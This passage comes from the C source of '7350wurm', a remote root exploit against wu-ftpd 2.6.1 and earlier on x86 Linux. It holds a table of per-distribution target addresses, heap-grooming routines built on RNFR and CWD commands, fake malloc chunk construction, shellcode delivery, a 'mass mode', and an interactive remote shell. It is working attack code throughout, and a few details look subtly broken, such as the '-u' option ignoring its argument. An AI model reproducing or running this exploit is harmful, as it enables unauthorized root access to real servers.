x86_wrx, sizeof (x86_wrx) - 1,
0x0806db80, 0x0807f5a0 },
{ "Debian potato [wu-ftpd_2.6.0-5.3.deb]",
"Version wu-2.6.0(1) Thu Feb 8 17:45:47 CET 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806db80, 0x0807f5a0 },
{ "Debian sid [wu-ftpd_2.6.1-5_i386.deb]",
"Version wu-2.6.1(1) Sat Feb 24 01:43:53 GMT 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806e7a0, 0x0807ffe0 },
{ "Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm]",
"Version wu-2.6.0(1) Thu May 25 03:35:34 PDT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x080713e0, 0x08082e00 },
{ "Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm]",
"Version wu-2.6.1(1) Mon Jan 29 08:04:31 PST 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x08072bd4, 0x08086400 },
{ "Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.i586.rpm]",
"Version wu-2.6.1(1) Mon Jan 15 20:52:49 CET 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806f7f0, 0x08082600 },
{ "Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm]",
"Version wu-2.6.1(1) Wed Jan 10 07:07:00 CET 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x08071850, 0x08084660 },
{ "Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm]",
"Version wu-2.6.1(1) Sun Sep 9 16:30:24 CEST 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806fec4, 0x08082b40 },
{ "RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm]",
"Version wu-2.4.2-academ[BETA-18](1) "
"Mon Jan 18 19:19:31 EST 1999",
x86_wrx, sizeof (x86_wrx) - 1,
0x08061cf0, 0x08068540 }, /* XXX: manually found */
{ "RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm]",
"Version wu-2.4.2-academ[BETA-18](1) "
"Mon Aug 3 19:17:20 EDT 1998",
x86_wrx, sizeof (x86_wrx) - 1,
0x08061c48, 0x08068490 }, /* XXX: manually found */
{ "RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm]",
"Version wu-2.6.0(1) Fri Jun 23 09:22:33 EDT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806b530, 0x08076550 }, /* XXX: manually found */
#if 0
/* XXX: not exploitable using synnergy.net method. (glob code
* does not handle {.,.,.,.}
*/
{ "RedHat 6.0 (Hedwig) [wu-ftpd-2.4.2vr17-3.i386.rpm]",
"Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999",
x86_wrx, sizeof (x86_wrx) - 1,
0x08069f04, 0x08079f60 },
#endif
{ "RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm]",
"Version wu-2.6.0(1) Thu Oct 21 12:27:00 EDT 1999",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806e620, 0x080803e0 },
{ "RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm]",
"Version wu-2.6.0(1) Fri Jun 23 09:17:44 EDT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x08070538, 0x08083360 },
{ "RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm]",
"Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806cb88, 0x0807cc40 },
{ "RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm]",
"Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806e1a0, 0x0807fbc0 },
{ "RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm]",
"Version wu-2.6.1(1) Wed Aug 9 05:54:50 EDT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x08070ddc, 0x08084600 },
{ "RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]",
"Version wu-2.6.1-16",
x86_wrx, sizeof (x86_wrx) - 1,
0x0807314c, 0x08085de0 },
{ "RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm]",
"Version wu-2.6.1-18",
x86_wrx, sizeof (x86_wrx) - 1,
0x08072c30, 0x08085900 },
{ "SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm]",
"Version wu-2.6.0(1) Wed Aug 30 22:26:16 GMT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806e6b4, 0x080800c0 },
{ "SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm]",
"Version wu-2.4.2-academ[BETA-18](1) "
"Wed Aug 30 22:26:37 GMT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806989c, 0x08069f80 },
{ "SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm]",
"Version wu-2.6.0(1) Thu Oct 28 23:35:06 GMT 1999",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806f85c, 0x08081280 },
{ "SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm]",
"Version wu-2.6.0(1) Mon Jun 26 13:11:34 GMT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806f4e0, 0x08080f00 },
{ "SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm]",
"Version wu-2.4.2-academ[BETA-18](1) "
"Mon Jun 26 13:11:56 GMT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806a234, 0x0806a880 },
{ "SuSE 7.0 [wuftpd.rpm]",
"Version wu-2.6.0(1) Wed Sep 20 23:52:03 GMT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806f180, 0x08080ba0 },
{ "SuSE 7.0 wu-2.4.2 [wuftpd.rpm]",
"Version wu-2.4.2-academ[BETA-18](1) "
"Wed Sep 20 23:52:21 GMT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806a554, 0x0806aba0 },
{ "SuSE 7.1 [wuftpd.rpm]",
"Version wu-2.6.0(1) Thu Mar 1 14:43:47 GMT 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806f168, 0x08080980 },
{ "SuSE 7.1 wu-2.4.2 [wuftpd.rpm]",
"Version wu-2.4.2-academ[BETA-18](1) "
"Thu Mar 1 14:44:08 GMT 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806a534, 0x0806ab80 },
{ "SuSE 7.2 [wuftpd.rpm]",
"Version wu-2.6.0(1) Mon Jun 18 12:34:55 GMT 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806f58c, 0x08080dc0 },
{ "SuSE 7.2 wu-2.4.2 [wuftpd.rpm]",
"Version wu-2.4.2-academ[BETA-18](1) "
"Mon Jun 18 12:35:12 GMT 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806a784, 0x0806ae40 },
{ "SuSE 7.3 [wuftpd.rpm]",
"Version wu-2.6.0(1) Thu Oct 25 03:14:33 GMT 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806f31c, 0x08080aa0 },
{ "SuSE 7.3 wu-2.4.2 [wuftpd.rpm]",
"Version wu-2.4.2-academ[BETA-18](1) "
"Thu Oct 25 03:14:49 GMT 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806a764, 0x0806ad60 },
#if 0
/* slackware (from 8 on they use proftpd by default) */
{ "Slackware 7",
"Version wu-2.6.0(1) Fri Oct 22 00:38:20 CDT 1999",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806d03c, 0x0808f648 },
#endif
{ "Slackware 7.1",
"Version wu-2.6.0(1) Tue Jun 27 10:52:28 PDT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806ba2c, },
{ NULL, NULL, 0, 0, 0, 0 },
};
/* exploitation related stuff.
* DO NOT CHANGE, except you know exactly what you are doing.
*/
#define CHUNK_POS 256
#define MALLOC_ALIGN_MASK 0x07
#define MALLOC_MINSIZE 0x10
#define CHUNK_ALLSIZE(s) \
CHUNK_ROUND((s)) + 0x08
#define CHUNK_ROUND(s) \
(((((s) + 4 + MALLOC_ALIGN_MASK)) < \
(MALLOC_MINSIZE + MALLOC_ALIGN_MASK)) ? \
(MALLOC_MINSIZE) : ((((s) + 4 + MALLOC_ALIGN_MASK)) & \
~MALLOC_ALIGN_MASK))
/* minimum sized malloc(n) allocation that will jield in an overall
* chunk size of s. (s must be a valid %8=0 chunksize)
*/
#define CHUNK_ROUNDDOWN(s) \
((s) <= 0x8) ? (1) : ((s) - 0x04 - 11)
#define CHUNK_STRROUNDDOWN(s) \
(CHUNK_ROUNDDOWN ((s)) > 1 ? CHUNK_ROUNDDOWN ((s)) - 1 : 1)
/* FTP related stuff
*/
char * dest = "127.0.0.1"; /* can be changed with -d */
char * username = "ftp"; /* can be changed with -u */
char * password = "mozilla@"; /* can be changed with -p */
char * ftp_banner = NULL;
int verbose = 0;
/* FTP prototypes
*/
void ftp_escape (unsigned char *buf, unsigned long int buflen);
void ftp_recv_until (int sock, char *buff, int len, char *begin);
int ftp_login (char *host, char *user, char *pass);
/* main prototypes
*/
void usage (char *progname);
void exploit (int fd, tgt_type *tgt);
void shell (int sock);
void hexdump (char *desc, unsigned char *data, unsigned int amount);
void tgt_list (void);
tgt_type * tgt_frombanner (unsigned char *banner);
void xp_buildsize (int fd, unsigned char this_size_ls,
unsigned long int csize);
void xp_gapfill (int fd, int rnfr_num, int rnfr_size);
int xp_build (tgt_type *tgt, unsigned char *buf, unsigned long int buf_len);
void xp_buildchunk (tgt_type *tgt, unsigned char *cspace, unsigned int clen);
/*** MASS mode stuff
*/
static int
sc_build_x86_lnx (unsigned char *target, size_t target_len,
unsigned char *shellcode, char **argv);
int mass = 0; /* enable with -m (kids, get hurt!) */
unsigned int mlen = 0;
unsigned char mcode[256];
/* imported from network.c
*/
#define NET_CONNTIMEOUT 60
#define NET_READTIMEOUT 20
int net_conntimeout = NET_CONNTIMEOUT;
unsigned long int net_resolve (char *host);
int net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec);
void net_write (int fd, const char *str, ...);
int net_rtimeout (int fd, int sec);
int net_rlinet (int fd, char *buf, int bufsize, int sec);
/* exploitation related stuff, which is fixed on all wuftpd systems
*/
#define RNFR_SIZE 4
#define RNFR_NUM 73
int automode = 0; /* evil, do not use */
int debugmode = 0;
void
usage (char *progname)
{
fprintf (stderr, "usage: %s [-h] [-v] [-a] [-D] [-m]\n"
"\t[-t <num>] [-u <user>] [-p <pass>] [-d host]\n"
"\t[-L <retloc>] [-A <retaddr>]\n\n", progname);
fprintf (stderr,
"-h\tthis help\n"
"-v\tbe verbose (default: off, twice for greater effect)\n"
"-a\tAUTO mode (target from banner)\n"
"-D\tDEBUG mode (waits for keypresses)\n"
"-m\tenable mass mode (use with care)\n"
"-t num\tchoose target (0 for list, try -v or -v -v)\n"
"-u user\tusername to login to FTP (default: \"ftp\")\n"
"-p pass\tpassword to use (default: \"mozilla@\")\n"
"-d dest\tIP address or fqhn to connect to "
"(default: 127.0.0.1)\n"
"-L loc\toverride target-supplied retloc "
"(format: 0xdeadbeef)\n"
"-A addr\toverride target-supplied retaddr "
"(format: 0xcafebabe)\n");
fprintf (stderr, "\n");
exit (EXIT_FAILURE);
}
unsigned char * shellcode = NULL;
unsigned long int shellcode_len = 0;
unsigned long int user_retloc = 0,
user_retaddr = 0;
int
main (int argc, char *argv[])
{
char c;
char * progname; /* = argv[0] */
int fd;
tgt_type * tgt = NULL;
int tgt_num = -1;
unsigned char xpbuf[512 + 16];
fprintf (stderr, "7350wurm - x86/linux wuftpd <= 2.6.1 remote root "
"(version "VERSION")\n"
"team teso (thx bnuts, tomas, synnergy.net !).\n\n");
progname = argv[0];
if (argc < 2)
usage (progname);
while ((c = getopt (argc, argv, "hvaDmt:u:p:d:L:A:")) != EOF) {
switch (c) {
case 'h':
usage (progname);
break;
case 'a':
automode = 1;
break;
case 'D':
debugmode = 1;
break;
case 'v':
verbose += 1;
break;
case 'm':
mass = 1;
break;
case 't':
if (sscanf (optarg, "%u", &tgt_num) != 1)
usage (progname);
break;
case 'u':
username = "h0ra";
printf ("username = %s\n", optarg);
break;
case 'p':
password = optarg;
break;
case 'd':
dest = optarg;
break;
case 'L':
if (sscanf (optarg, "0x%lx", &user_retloc) != 1)
usage (progname);
break;
case 'A':
if (sscanf (optarg, "0x%lx", &user_retaddr) != 1)
usage (progname);
break;
default:
usage (progname);
break;
}
}
/* if both required offsets are given manually, then we dont have
* to require a target selection. otherwise check whether the target
* is within the list. if its not, then print a list of available
* targets
*/
if (user_retloc != 0 && user_retaddr != 0) {
tgt = &tmanual;
} else if (automode == 0 && (tgt_num == 0 ||
tgt_num >= (sizeof (targets) / sizeof (tgt_type))))
{
if (tgt_num != 0)
printf ("WARNING: target out of list. list:\n\n");
tgt_list ();
exit (EXIT_SUCCESS);
}
if (tgt == NULL && automode == 0)
tgt = &targets[tgt_num - 1];
if (mass == 1) {
if ((argc - optind) == 0)
usage (progname);
mlen = sc_build_x86_lnx (mcode, sizeof (mcode),
x86_lnx_execve, &argv[optind]);
if (mlen >= 0xff) {
fprintf (stderr, "created argv-code too long "
"(%d bytes)\n", mlen);
exit (EXIT_FAILURE);
}
fprintf (stderr, "# created %d byte execve shellcode\n", mlen);
}
printf ("# trying to log into %s with (%s/%s) ...", dest,
username, password);
fflush (stdout);
fd = ftp_login (dest, username, password);
if (fd <= 0) {
fprintf (stderr, "\nfailed to connect (user/pass correct?)\n");
exit (EXIT_FAILURE);
}
printf (" connected.\n");
if (debugmode) {
printf ("DEBUG: press enter\n");
getchar ();
}
printf ("# banner: %s", (ftp_banner == NULL) ? "???" :
ftp_banner);
if (tgt == NULL && automode) {
tgt = tgt_frombanner (ftp_banner);
if (tgt == NULL) {
printf ("# failed to jield target from banner, aborting\n");
exit (EXIT_FAILURE);
}
printf ("# successfully selected target from banner\n");
}
if (shellcode == NULL) {
shellcode = tgt->shellcode;
shellcode_len = tgt->shellcode_len;
}
if (verbose >= 2) {
printf ("using %lu byte shellcode:\n", shellcode_len);
hexdump ("shellcode", shellcode, shellcode_len);
}
if (user_retaddr != 0) {
fprintf (stderr, "# overriding target retaddr with: 0x%08lx\n",
user_retaddr);
}
if (user_retloc != 0) {
fprintf (stderr, "# overriding target retloc with: 0x%08lx\n",
user_retloc);
tgt->retloc = user_retloc;
}
printf ("\n### TARGET: %s\n\n", tgt->desc);
/* real stuff starts from here
*/
printf ("# 1. filling memory gaps\n");
xp_gapfill (fd, RNFR_NUM, RNFR_SIZE);
exploit (fd, tgt);
printf ("# 3. triggering free(globlist[1])\n");
net_write (fd, "CWD ~{\n");
ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "sP");
if (strncmp (xpbuf, "sP", 2) != 0) {
fprintf (stderr, "exploitation FAILED !\noutput:\n%s\n",
xpbuf);
exit (EXIT_FAILURE);
}
printf ("#\n# exploitation succeeded. sending real shellcode\n");
if (mass == 1) {
printf ("# mass mode, sending constructed argv code\n");
write (fd, mcode, mlen);
printf ("# send. sleeping 10 seconds\n");
sleep (10);
printf ("# success.\n");
exit (EXIT_SUCCESS);
}
printf ("# sending setreuid/chroot/execve shellcode\n");
net_write (fd, "%s", x86_lnx_shell);
printf ("# spawning shell\n");
printf ("##################################################"
"##########################\n");
write (fd, INIT_CMD, strlen (INIT_CMD));
shell (fd);
exit (EXIT_SUCCESS);
}
void
exploit (int fd, tgt_type *tgt)
{
unsigned long int dir_chunk_size,
bridge_dist,
padchunk_size,
fakechunk_size,
pad_before;
unsigned char * dl; /* dirlength */
unsigned char xpbuf[512 + 64];
/* figure out home directory length
*/
net_write (fd, "PWD\n");
ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "257 ");
dl = strchr (xpbuf, '"');
if (dl == NULL || strchr (dl + 1, '"') == NULL) {
fprintf (stderr, "faulty PWD reply: %s\n", xpbuf);
exit (EXIT_FAILURE);
}
dir_chunk_size = 0;
for (dl += 1 ; *dl != '"' ; ++dl)
dir_chunk_size += 1;
if (verbose)
printf ("PWD path (%lu): %s\n", dir_chunk_size, xpbuf);
/* compute chunk size from it (needed later)
*/
dir_chunk_size += 3; /* ~/ + NUL byte */
dir_chunk_size = CHUNK_ROUND (dir_chunk_size);
if (debugmode)
printf ("dir_chunk_size = 0x%08lx\n", dir_chunk_size);
/* send preparation buffer to store the fakechunk in the end of
* the malloc buffer allocated from within the parser ($1)
*/
printf ("# 2. sending bigbuf + fakechunk\n");
xp_build (tgt, xpbuf, 500 - strlen ("LIST "));
if (verbose)
hexdump ("xpbuf", xpbuf, strlen (xpbuf));
ftp_escape (xpbuf, sizeof (xpbuf));
net_write (fd, "CWD %s\n", xpbuf);
ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "550 ");
/* synnergy.net uberleet method (thank you very much guys !)
*/
net_write (fd, "CWD ~/{.,.,.,.}\n");
ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "250 ");
/* now, we flush the last-used-chunk marker in glibc malloc code. else
* we might land in a previously used bigger chunk, but we need a
* sequential order. "CWD ." will allocate a two byte chunk, which will
* be reused on any later small malloc.
*/
net_write (fd, "CWD .\n");
ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "250 ");
/* cause chunk with padding size
*/
pad_before = CHUNK_ALLSIZE (strlen ("~/{.,.,.,.}\n")) +
dir_chunk_size - 0x08;
xp_gapfill (fd, 1, CHUNK_ROUNDDOWN (pad_before));
/* 0x10 (CWD ~/{.,.,.,.}) + 4 * dirchunk */
bridge_dist = 0x10 + 4 * dir_chunk_size;
if (debugmode)
printf ("bridge_dist = 0x%08lx\n", bridge_dist);
/* 0x18 (RNFR 16), dcs (RNFR dir), 0x10 (CWD ~{) */
padchunk_size = bridge_dist - 0x18 - dir_chunk_size - 0x10;
if (debugmode)
printf ("padchunk_size = 0x%08lx\n", padchunk_size);
/* +4 = this_size field itself */
fakechunk_size = CHUNK_POS + 4;
fakechunk_size -= pad_before;
fakechunk_size += 0x04; /* account for prev_size, too */
fakechunk_size |= 0x1; /* set PREV_INUSE */
if (debugmode)
printf ("fakechunk_size = 0x%08lx\n", fakechunk_size);
xp_buildsize (fd, fakechunk_size, 0x10);
/* pad down to the minimum possible size in 8 byte alignment
*/
if (verbose)
printf ("\npadchunk_size = 0x%08lx\n==> %lu\n",
padchunk_size, padchunk_size - 8 - 1);
xp_gapfill (fd, 1, padchunk_size - 8 - 1);
if (debugmode) {
printf ("press enter\n");
getchar ();
}
return;
}
/* tgt_list
*
* give target list
*/
void
tgt_list (void)
{
int tgt_num;
printf ("num . description\n");
printf ("----+-----------------------------------------------"
"--------\n");
for (tgt_num = 0 ; targets[tgt_num].desc != NULL ; ++tgt_num) {
printf ("%3d | %s\n", tgt_num + 1, targets[tgt_num].desc);
if (verbose)
printf (" : %s\n", targets[tgt_num].banner);
if (verbose >= 2)
printf (" : retloc: 0x%08lx "
"cbuf: 0x%08lx\n",
targets[tgt_num].retloc,
targets[tgt_num].cbuf);
}
printf (" '\n");
return;
}
/* tgt_frombanner
*
* try to automatically select target from ftp banner
*
* return pointer to target structure on success
* return NULL on failure
*/
tgt_type *
tgt_frombanner (unsigned char *banner)
{
int tw; /* target list walker */
for (tw = 0 ; targets[tw].desc != NULL ; ++tw) {
if (strstr (banner, targets[tw].banner) != NULL)
return (&targets[tw]);
}
return (NULL);
}
/* xp_buildsize
*
* set chunksize to this_size_ls. do this in a csize bytes long chunk.
* normally csize = 0x10. csize is always a padded chunksize.
*/
void
xp_buildsize (int fd, unsigned char this_size_ls, unsigned long int csize)
{
int n,
cw; /* chunk walker */
unsigned char tmpbuf[512];
unsigned char * leet = "7350";
for (n = 2 ; n > 0 ; --n) {
memset (tmpbuf, '\0', sizeof (tmpbuf));
for (cw = 0 ; cw < (csize - 0x08) ; ++cw)
tmpbuf[cw] = leet[cw % 4];
tmpbuf[cw - 4 + n] = '\0';
if (debugmode)
printf (": CWD %s\n", tmpbuf);
net_write (fd, "CWD %s\n", tmpbuf);
ftp_recv_until (fd, tmpbuf, sizeof (tmpbuf), "550 ");
}
memset (tmpbuf, '\0', sizeof (tmpbuf));
for (cw = 0 ; cw < (csize - 0x08 - 0x04) ; ++cw)
tmpbuf[cw] = leet[cw % 4];
if (debugmode)
printf ("| CWD %s\n", tmpbuf);
net_write (fd, "CWD %s%c\n", tmpbuf, this_size_ls);
ftp_recv_until (fd, tmpbuf, sizeof (tmpbuf), "550 ");
/* send a minimum-sized malloc request that will allocate a chunk
* with 'csize' overall bytes
*/
xp_gapfill (fd, 1, CHUNK_STRROUNDDOWN (csize));
return;
}
/* xp_gapfill
*
* fill all small memory gaps in wuftpd malloc space. do this by sending
* rnfr requests which cause a memleak in wuftpd.
*
* return in any case
*/
void
xp_gapfill (int fd, int rnfr_num, int rnfr_size)
{
int n;
unsigned char * rb; /* rnfr buffer */
unsigned char * rbw; /* rnfr buffer walker */
unsigned char rcv_buf[512]; /* temporary receive buffer */
if (debugmode)
printf ("RNFR: %d x 0x%08x (%d)\n",
rnfr_num, rnfr_size, rnfr_size);
rbw = rb = calloc (1, rnfr_size + 6);
strcpy (rbw, "RNFR ");
rbw += strlen (rbw);
/* append a string of "././././". since wuftpd only checks whether
* the pathname is lstat'able, it will go through without any problems
*/
for (n = 0 ; n < rnfr_size ; ++n)
strcat (rbw, ((n % 2) == 0) ? "." : "/");
strcat (rbw, "\n");
for (n = 0 ; n < rnfr_num; ++n) {
net_write (fd, "%s", rb);
ftp_recv_until (fd, rcv_buf, sizeof (rcv_buf), "350 ");
}
free (rb);
return;
}
#define ADDR_STORE(ptr,addr){\
((unsigned char *) (ptr))[0] = (addr) & 0xff;\
((unsigned char *) (ptr))[1] = ((addr) >> 8) & 0xff;\
((unsigned char *) (ptr))[2] = ((addr) >> 16) & 0xff;\
((unsigned char *) (ptr))[3] = ((addr) >> 24) & 0xff;\
}
int
xp_build (tgt_type *tgt, unsigned char *buf, unsigned long int buf_len)
{
unsigned char * wl;
memset (buf, '\0', buf_len);
memset (buf, '0', CHUNK_POS);
xp_buildchunk (tgt, buf + CHUNK_POS, buf_len - CHUNK_POS - 1);
for (wl = buf + strlen (buf) ; wl < &buf[buf_len - 1] ; wl += 2) {
wl[0] = '\xeb';
wl[1] = '\x0c';
}
memcpy (&buf[buf_len - 1] - shellcode_len, shellcode,
shellcode_len);
return (strlen (buf));
}
/* xp_buildchunk
*
* build the fake malloc chunk that will overwrite retloc with retaddr
*/
void
xp_buildchunk (tgt_type *tgt, unsigned char *cspace, unsigned int clen)
{
unsigned long int retaddr_eff; /* effective */
if (user_retaddr)
retaddr_eff = user_retaddr;
else
retaddr_eff = tgt->cbuf + 512 - shellcode_len - 16;
fprintf (stderr, "\tbuilding chunk: ([0x%08lx] = 0x%08lx) in %d bytes\n",
tgt->retloc, retaddr_eff, clen);
/* easy, straight forward technique
*/
ADDR_STORE (&cspace[0], 0xfffffff0); /* prev_size */
ADDR_STORE (&cspace[4], 0xfffffffc); /* this_size */
ADDR_STORE (&cspace[8], tgt->retloc - 12); /* fd */
ADDR_STORE (&cspace[12], retaddr_eff); /* bk */
return;
}
void
shell (int sock)
{
int l;
char buf[512];
fd_set rfds;
while (1) {
FD_SET (0, &rfds);
FD_SET (sock, &rfds);
select (sock + 1, &rfds, NULL, NULL, NULL);
if (FD_ISSET (0, &rfds)) {
l = read (0, buf, sizeof (buf));
if (l <= 0) {
perror ("read user");
exit (EXIT_FAILURE);
}
write (sock, buf, l);
}
if (FD_ISSET (sock, &rfds)) {
l = read (sock, buf, sizeof (buf));
if (l == 0) {
printf ("connection closed by foreign host.\n");
exit (EXIT_FAILURE);
} else if (l < 0) {
perror ("read remote");
exit (EXIT_FAILURE);
}
write (1, buf, l);
}
}
}
/*** FTP functions
*/
/* FTP is TELNET is SHIT.
*/
void
ftp_escape (unsigned char *buf, unsigned long int buflen)
{
unsigned char * obuf = buf;
for ( ; *buf != '\0' ; ++buf) {
if (*buf == 0xff &&
(((buf - obuf) + strlen (buf) + 1) < buflen))
{
memmove (buf + 1, buf, strlen (buf) + 1);
buf += 1;
}
}
}
void
ftp_recv_until (int sock, char *buff, int len, char *begin)
{
char dbuff[2048];
if (buff == NULL) {
buff = dbuff;
len = sizeof (dbuff);
}
do {
memset (buff, '\x00', len);
if (net_rlinet (sock, buff, len - 1, 20) <= 0)
return;
} while (memcmp (buff, begin, strlen (begin)) != 0);
return;
}
int
ftp_login (char *host, char *user, char *pass)
{
int ftpsock;
char resp[512];
ftpsock = net_connect (NULL, host, 21, 30);
if (ftpsock <= 0)
return (0);
memset (resp, '\x00', sizeof (resp));
if (net_rlinet (ftpsock, resp, sizeof (resp) - 1, 20) <= 0)
goto flerr;
/* handle multiline pre-login stuff (rfc violation !)
*/
if (memcmp (resp, "220-", 4) == 0)
ftp_recv_until (ftpsock, resp, sizeof (resp), "220 ");
if (memcmp (resp, "220 ", 4) != 0) {
if (verbose)
printf ("\n%s\n", resp);
goto flerr;
}
ftp_banner = strdup (resp);
net_write (ftpsock, "USER %s\n", user);
memset (resp, '\x00', sizeof (resp));
if (net_rlinet (ftpsock, resp, sizeof (resp) - 1, 20) <= 0)
goto flerr;
if (memcmp (resp, "331 ", 4) != 0) {
if (verbose)
printf ("\n%s\n", resp);
goto flerr;
}
net_write (ftpsock, "PASS %s\n", pass);
memset (resp, '\x00', sizeof (resp));
if (net_rlinet (ftpsock, resp, sizeof (resp) - 1, 20) <= 0)
goto flerr;
/* handle multiline responses from ftp servers
*/
if (memcmp (resp, "230-", 4) == 0)
ftp_recv_until (ftpsock, resp, sizeof (resp), "230 ");
if (memcmp (resp, "230 ", 4) != 0) {
if (verbose)
printf ("\n%s\n", resp);
goto flerr;
}
return (ftpsock);
flerr:
if (ftpsock > 0)
close (ftpsock);
return (0);
}
/* ripped from zodiac */
void
hexdump (char *desc, unsigned char *data, unsigned int amount)
{
unsigned int dp, p; /* data pointer */
const char trans[] =
"................................ !\"#$%&'()*+,-./0123456789"
":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
"nopqrstuvwxyz{|}~................................. ..."
".................................................. ..."
"........................................";
printf ("/* %s, %u bytes */\n", desc, amount);
for (dp = 1; dp <= amount; dp++) {
fprintf (stderr, "%02x ", data[dp-1]);
if ((dp % 8) == 0)
fprintf (stderr, " ");
if ((dp % 16) == 0) {
fprintf (stderr, "| ");
p = dp;
for (dp -= 16; dp < p; dp++)
fprintf (stderr, "%c", trans[data[dp]]);
fflush (stderr);
fprintf (stderr, "\n");
}
fflush (stderr);
}
if ((amount % 16) != 0) {
p = dp = 16 - (amount % 16);
for (dp = p; dp > 0; dp--) {
fprintf (stderr, " ");
if (((dp % 8) == 0) && (p != 8))
fprintf (stderr, " ");
fflush (stderr);
}
fprintf (stderr, " | ");
for (dp = (amount - (16 - p)); dp < amount; dp++)
fprintf (stderr, "%c", trans[data[dp]]);
fflush (stderr);
}
fprintf (stderr, "\n");
return;
}
unsigned long int
net_resolve (char *host)
{
long i;
struct hostent *he;
i = inet_addr(host);
if (i == -1) {
he = gethostbyname(host);
if (he == NULL) {
return (0);
} else {
return (*(unsigned long *) he->h_addr);
}
}
return (i);
}
int
net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec)
{
int n,
len,
error,
flags;
int fd;
struct timeval tv;
fd_set rset, wset;
struct sockaddr_in csa;
if (cs == NULL)
cs = &csa;
/* first allocate a socket */
cs->sin_family = AF_INET;
cs->sin_port = htons (port);
fd = socket (cs->sin_family, SOCK_STREAM, 0);
if (fd == -1)
return (-1);
if (!(cs->sin_addr.s_addr = net_resolve (server))) {
close (fd);
return (-1);
}
flags = fcntl (fd, F_GETFL, 0);
if (flags == -1) {
close (fd);
return (-1);
}
n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
if (n == -1) {
close (fd);
return (-1);
}
error = 0;
n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
if (n < 0) {
if (errno != EINPROGRESS) {
close (fd);
return (-1);
}
}
if (n == 0)
goto done;
FD_ZERO(&rset);
FD_ZERO(&wset);
FD_SET(fd, &rset);
FD_SET(fd, &wset);
tv.tv_sec = sec;
tv.tv_usec = 0;
n = select(fd + 1, &rset, &wset, NULL, &tv);
if (n == 0) {
close(fd);
errno = ETIMEDOUT;
return (-1);
}
if (n == -1)
return (-1);
if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
len = sizeof(error);
if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
errno = ETIMEDOUT;
return (-1);
}
if (error == 0) {
goto done;
} else {
errno = error;
return (-1);
}
}
} else
return (-1);
done:
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);
return (fd);
}
void
net_write (int fd, const char *str, ...)
{
char tmp[1025];
va_list vl;
int i;
va_start(vl, str);
memset(tmp, 0, sizeof(tmp));
i = vsnprintf(tmp, sizeof(tmp), str, vl);
va_end(vl);
#ifdef DEBUG
printf ("[snd] %s%s", tmp, (tmp[strlen (tmp) - 1] == '\n') ? "" : "\n");
#endif
send(fd, tmp, i, 0);
return;
}
int
net_rlinet (int fd, char *buf, int bufsize, int sec)
{
int n;
unsigned long int rb = 0;
struct timeval tv_start, tv_cur;
memset(buf, '\0', bufsize);
